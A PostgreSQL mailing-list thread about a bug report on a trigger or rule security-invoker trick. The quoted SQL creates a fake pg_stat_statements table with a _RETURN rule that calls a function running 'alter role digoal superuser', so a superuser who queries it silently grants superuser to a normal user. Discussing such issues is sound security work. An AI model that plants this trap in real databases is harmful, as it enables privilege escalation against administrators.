Re: BUG #13651: trigger security invoker attack

And what would be an acceptable solution/behavior in your eyes?

On Tuesday, September 29, 2015, 德哥 <digoal(at)126(dot)com> wrote:

>
> The point is:
> Superuser will be trick possible. like phishing sites.
> FOR EXP:
> DBA, or some monitor / admin software query these table or view.
>
> --
> 公益是一辈子的事,I'm Digoal,Just Do It.
>
> 在 2015-09-30 10:01:12，"David G. Johnston" <david(dot)g(dot)johnston(at)gmail(dot)com
> <javascript:_e(%7B%7D,'cvml','david(dot)g(dot)johnston(at)gmail(dot)com');>> 写道：
>
> On Tuesday, September 29, 2015, 德哥 <digoal(at)126(dot)com
> <javascript:_e(%7B%7D,'cvml','digoal(at)126(dot)com');>> wrote:
>
>> a normal user get super privilege, use security invoker function.
>> postgres=> create table pg_stat_statements (
>> userid oid ,
>> dbid oid ,
>> queryid bigint ,
>> query text ,
>> calls bigint ,
>> total_time double precision ,
>> rows bigint ,
>> shared_blks_hit bigint ,
>> shared_blks_read bigint ,
>> shared_blks_dirtied bigint ,
>> shared_blks_written bigint ,
>> local_blks_hit bigint ,
>> local_blks_read bigint ,
>> local_blks_dirtied bigint ,
>> local_blks_written bigint ,
>> temp_blks_read bigint ,
>> temp_blks_written bigint ,
>> blk_read_time double precision ,
>> blk_write_time double precision );
>>
>> postgres=> create or replace function f() returns pg_stat_statements as
>> $$
>> declare
>> begin
>> alter role digoal superuser;
>> end;
>> $$ language plpgsql security invoker;
>> CREATE FUNCTION
>>
>> postgres=> create rule "_RETURN" as on select to pg_stat_statements do
>> instead select * from f();
>> CREATE RULE
>>
>> When a super user select the view pg_stat_statements , the normal user
>> digoal will granted the superuser role.
>>
>> Yes, it's a normal operation ,but somebody can use these trick.
>>
>
>
> Everything you just wrote was done as superuser so what's your point?
>
> David J.
>
>